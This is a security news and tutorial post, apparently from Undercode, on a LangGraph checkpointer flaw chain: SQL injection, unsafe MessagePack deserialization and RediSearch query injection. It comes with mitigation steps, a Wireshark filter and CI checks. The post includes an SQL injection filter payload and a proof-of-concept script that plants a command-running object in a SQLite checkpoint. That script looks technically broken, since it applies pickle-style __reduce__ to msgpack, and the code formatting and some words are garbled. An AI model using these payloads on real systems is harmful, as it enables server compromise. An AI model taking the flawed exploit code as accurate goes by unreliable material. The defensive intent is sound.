Poisoned Memory, Silent Takeover: How LangGraph Checkpoint Flaws Enable Full Server RCE + Video

By /

Listen to this Post

Featured Image

Introduction:

LangGraph, a leading framework for building stateful AI agents, boasts nearly 46.5 million monthly downloads. A critical vulnerability chain recently discovered by Check Point Research exposes a dangerous reality: the very component that gives AI agents memory—the checkpointer—can become a direct path to remote code execution (RCE) when chained with SQL injection and unsafe deserialization. This flaw is not a theoretical risk; it’s a clear and present danger for self-hosted AI infrastructures that rely on SQLite or Redis for state persistence.

Learning Objectives:

  • Understand the Chain: Analyze how SQL injection (CVE-2025-67644) combines with unsafe MessagePack deserialization (CVE-2026-28277) to achieve RCE.
  • Master Mitigation: Learn to configure strict deserialization policies, parameterize database queries, and apply patched versions to harden self-hosted LangGraph deployments.
  • Develop Detection Skills: Identify and exploit vulnerable checkpointer configurations in a controlled lab environment using provided Linux commands, Python payloads, and Wireshark detection techniques.

You Should Know:

  1. The LangGraph Checkpointer: Your Agent’s Memory, Now a Weapon
    LangGraph uses a checkpointer to save and retrieve the state of an AI agent at each step of its workflow. Self-hosted deployments frequently use SQLite or Redis as this persistence layer. This is where the attack begins.

The Vulnerability Chain:

  1. SQL Injection (CVE-2025-67644): The `get_state_history()` function’s filter parameter directly concatenates user input into an SQL query. An attacker can inject SQL to manipulate which checkpoint is fetched.
  2. Unsafe Deserialization (CVE-2026-28277): When the agent loads a checkpoint, LangGraph deserializes the MessagePack payload. By default, it reconstructs Python objects from untrusted data. By injecting SQL to point to a crafted checkpoint, the attacker forces the server to deserialize a malicious object, achieving remote code execution.

Step-by-Step Guide to Reproduce the RCE (Educational Lab Only):

First, set up a vulnerable environment. Do not deploy this in production.

 Create a Python virtual environment
python3 -m venv langgraph-lab
source langgraph-lab/bin/activate

Install a vulnerable version of LangGraph
pip install langgraph==1.0.8 langgraph-checkpoint-sqlite==3.0.0

Now, create a proof-of-concept exploit script. This code demonstrates the unsafe deserialization of a malicious MessagePack payload via a compromised SQLite checkpointer.

 exploit_checkpointer.py
 !!! EDUCATIONAL USE ONLY – Do not run on systems you do not own !!!
import msgpack
import sqlite3
import os
import subprocess

Step 1: Create a malicious MessagePack payload that runs 'calc.exe' or 'touch /tmp/pwned' 
class EvilCommand:
def <strong>reduce</strong>(self):
 Windows
if os.name == 'nt':
return (subprocess.Popen, (('calc.exe',),))
 Linux / macOS
else:
return (subprocess.call, (('touch', '/tmp/pwned'),))

Serialize the evil object using the default, unsafe encoder
malicious_payload = msgpack.packb(EvilCommand(), default=lambda x: x.<strong>reduce</strong>())

Step 2: Insert the malicious payload into a SQLite checkpoint 
conn = sqlite3.connect('checkpoints.db')
cursor = conn.cursor()

Create the checkpoints table if it doesn't exist (structure may vary)
cursor.execute("CREATE TABLE IF NOT EXISTS checkpoints (id TEXT PRIMARY KEY, data BLOB)")
 Insert or overwrite a checkpoint with the malicious data
cursor.execute("INSERT OR REPLACE INTO checkpoints (id, data) VALUES (?, ?)", ('malicious', malicious_payload))
conn.commit()
conn.close()
print("[+] Malicious checkpoint inserted. Next time LangGraph loads it, RCE will trigger.")

How the Attack Chain Works:

  1. SQL Injection to Redirect: The attacker uses SQL injection in the API call to get_state_history(). A payload like `?filter=1′ OR id=’malicious’ –` manipulates the query. Instead of returning the intended state, the database returns the `malicious` checkpoint.
  2. Unsafe Loading: The LangGraph application receives this checkpoint and automatically deserializes the MessagePack data. The `__reduce__` method in `EvilCommand` dictates what Python should do to reconstruct the object.
  3. Remote Code Execution: The `subprocess.call` or `subprocess.Popen` command is executed on the host server, leading to a complete system compromise.

Mitigation Commands (Linux/Windows):

  • Linux (Patch Immediately): Upgrade to the fixed versions: `pip install –upgrade langgraph>=1.0.10 langgraph-checkpoint-sqlite>=3.0.1 langgraph-checkpoint-redis>=1.0.2`
    – Windows (Pip): Ensure your environment is patched using the same `pip install –upgrade` command within your virtual environment.
  • Verify Installation: Run `pip show langgraph | grep Version` to confirm the patch level.
  1. Fortifying Your AI Infrastructure: Strict Mode and Allowlisting
    The most effective defense is to enable LangGraph’s built-in hardening mechanism. This restricts the deserialization process to only a safe set of Python objects, blocking the malicious `__reduce__` payload.

Configuration Guide for Mitigation:

  1. Enable Strict Mode (Environment Variable): Add this to your deployment configuration (.env file or system environment). 
    LANGGRAPH_STRICT_MSGPACK=1

    This changes the default behavior of `JsonPlusSerializer()` from “warn-and-allow” to “strict”.

  2. Strict Allowlisting (Code-Level): For fine-grained control, you can define exactly which custom classes are allowed to be deserialized. This is done by passing the `allowed_msgpack_modules` parameter to the checkpointer.

    from langgraph.checkpoint.sqlite import SqliteSaver

Only allow datetime.datetime and a custom class 'SafeUser' to be reconstructed
safe_checkpointer = SqliteSaver.from_conn_string(
"checkpoints.db",
allowed_msgpack_modules=[("datetime", "datetime"), ("myapp.models", "SafeUser")]
)

    If an attacker injects a payload trying to reconstruct subprocess.Popen, the deserializer will immediately block it, preventing RCE.

  3. The Redis Vector: Query Injection in RediSearch (CVE-2026-27022)
    The vulnerability extends beyond SQLite. The Redis checkpointer implementation, specifically `RedisSaver` and ShallowRedisSaver, fails to properly escape user input when constructing RediSearch queries. An attacker can inject RediSearch syntax characters to modify the query logic and bypass intended access controls.

  • Affected Package: `@langchain/langgraph-checkpoint-redis` prior to version 1.0.2.
  • Exploit Scenario: An attacker sends a malicious filter key containing RediSearch special characters like `@` or (. The application directly interpolates this into the query string, allowing the attacker to change the query’s meaning and potentially retrieve or manipulate unauthorized checkpoints.
  • Impact: While primarily an information disclosure and access control bypass, when combined with the unsafe deserialization flaw, it can be used to feed malicious checkpoints into the agent.
  • Fix: Upgrade to langgraph-checkpoint-redis>=1.0.2.

Wireshark Rule to Detect Redis Injection Attempts:

To monitor for potential exploitation attempts on your network, use this Wireshark display filter to inspect Redis traffic for suspicious patterns:

redis.command contains "FT.SEARCH" and (redis.command.string contains "@" or redis.command.string contains "(")
  1. The Blast Radius: Why AI Agent RCE is Worse Than a Typical Server Hack
    A compromised AI agent framework is a high-value target. These agents are not isolated; they are privileged entities holding API credentials, database access tokens, and keys to internal systems. An RCE in this layer is a direct path to lateral movement.

Post-Exploitation Actions an Attacker Can Take:

  • Exfiltrate LLM API Keys: Steal the keys used for the AI agent, leading to massive financial loss.
  • Manipulate Agent Decisions: The attacker is no longer just an external user trying prompt injection; they control the agent’s runtime. They can force it to approve malicious transactions or leak sensitive data.
  • Access Connected Systems: The agent likely has permissions to CRMs, internal databases, and other applications. The attacker inherits all these permissions.

Key Takeaway: Treat your AI infrastructure with the same, if not higher, security rigor as your crown jewel databases. A vulnerability in the agent is a vulnerability in every system the agent touches.

5. Hardening Windows and Linux Deployment Pipelines

Beyond patching, integrate these checks into your CI/CD pipeline to prevent vulnerable checkpointer configurations from ever reaching production.

For Linux DevOps (Bash Script):

 Check for vulnerable versions as part of your security scan
if pip show langgraph | grep -q "Version: 1.0.[0-8]"; then
echo "FAIL: Vulnerable langgraph version detected. Please upgrade."
exit 1
fi
 Check for STRICT mode environment variable
if [ -z "$LANGGRAPH_STRICT_MSGPACK" ]; then
echo "WARN: LANGGRAPH_STRICT_MSGPACK is not set. Enabling recommended security practice."
export LANGGRAPH_STRICT_MSGPACK=1
fi

For Windows PowerShell:

 Security Check for LangGraph Vulnerable Versions
$vulnerable_versions = @("1.0.8", "1.0.9")
$current_version = (pip show langgraph | Select-String "Version:").ToString().Split()[-1]
if ($vulnerable_versions -contains $current_version) {
Write-Host "CRITICAL: Vulnerable version $current_version detected. Upgrade immediately." -ForegroundColor Red
exit 1
}

What Undercode Say:

  • Key Takeaway 1: A poisoned AI memory is an attacker’s golden ticket. The chain of SQL injection and unsafe deserialization transforms a state persistence layer into a direct RCE vector, turning a post-exploitation write-access scenario into a full server takeover with lateral movement potential.
  • Key Takeaway 2: Strict-mode allowlisting is the de facto standard for secure AI agent deployment. The `LANGGRAPH_STRICT_MSGPACK` environment variable and explicit `allowed_msgpack_modules` configuration are non-1egotiable hardening controls that every self-hosted LangGraph deployment must implement.

Analysis: The LangGraph vulnerability chain highlights a systemic shift in cybersecurity: traditional exploits are not obsolete; they have found a new, more dangerous home in the permission-rich environment of AI agents. This research by Check Point is a wake-up call that the OWASP Top 10 (e.g., Injection, Deserialization) is directly applicable to the AI stack. The danger is amplified because AI agents are trusted with high-value credentials to perform actions on behalf of users. A successful exploit doesn’t just give an attacker a shell; it gives them the keys to the kingdom, allowing them to manipulate automated workflows and exfiltrate sensitive data from interconnected systems. The fix is simple—patch immediately and enforce strict deserialization policies—but the risk of leaving AI infrastructure unhardened is catastrophic, as it undermines the very trust placed in these autonomous systems.

Prediction:

  • +1 Heightened regulatory scrutiny for AI application security will emerge, requiring mandatory SBOMs and vulnerability disclosure processes for agentic frameworks, driving the creation of new compliance standards like “SOC for AI.”
  • +1 The development of automated, runtime “agent firewalls” will accelerate, designed specifically to intercept and validate checkpointer operations, deserialization attempts, and API calls made by AI agents in production.
  • -1 A wave of supply chain attacks targeting AI agent checkpoints will be reported within the next 12 months, as attackers weaponize this research to create worms that propagate through compromised AI memory stores.
  • -1 The complexity of securing self-hosted AI stacks will drive a mass migration towards managed platforms, creating dangerous monocultures and vendor lock-in, while also centralizing risk for large-scale, multi-tenant breaches.
  • -1 Legacy enterprise applications integrated with AI agents will become the weakest link, as attackers pivot from the AI runtime to vulnerable backend systems, circumdecades-old security controls via trusted agent pathways.

▶️ Related Video (84% Match):

🎯Let’s Practice For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

IT/Security Reporter URL:

Reported By: Mohit Hackernews – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky

Related Posts: